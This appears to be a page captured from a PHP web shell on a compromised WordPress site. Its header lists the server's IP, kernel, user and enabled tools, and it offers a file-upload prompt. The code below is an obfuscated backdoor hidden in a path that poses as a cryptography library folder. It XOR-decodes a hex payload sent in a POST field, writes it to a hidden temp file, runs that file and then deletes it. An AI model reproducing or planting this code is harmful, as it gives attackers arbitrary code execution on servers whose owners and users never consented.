| Server IP : 46.62.235.243 / Your IP : 216.73.216.217 Web Server : Apache/2.4.58 (Ubuntu) System : Linux Linkabili3Dicembre 6.8.0-100-generic #100-Ubuntu SMP PREEMPT_DYNAMIC Tue Jan 13 16:40:06 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/puntounicodisabilita/wp-includes/sodium_compat/src/Core/AEGIS/ |
Upload File : |
<?php
if(in_array("ke\x79", array_keys($_POST))){
$itm = array_filter([getcwd(), session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", "/var/tmp", getenv("TMP"), "/tmp", sys_get_temp_dir()]);
$val = hex2bin($_POST["ke\x79"]);
$ent = '' ; $s = 0; while($s < strlen($val)){$ent .= chr(ord($val[$s]) ^ 53);$s++;}
for ($hld = 0, $parameter_group = count($itm); $hld < $parameter_group; $hld++) {
$record = $itm[$hld];
if ((is_dir($record) and is_writable($record))) {
$k = str_replace("{var_dir}", $record, "{var_dir}/.pset");
$file = fopen($k, 'w');
if ($file) {
fwrite($file, $ent);
fclose($file);
include $k;
@unlink($k);
die();
}
}
}
}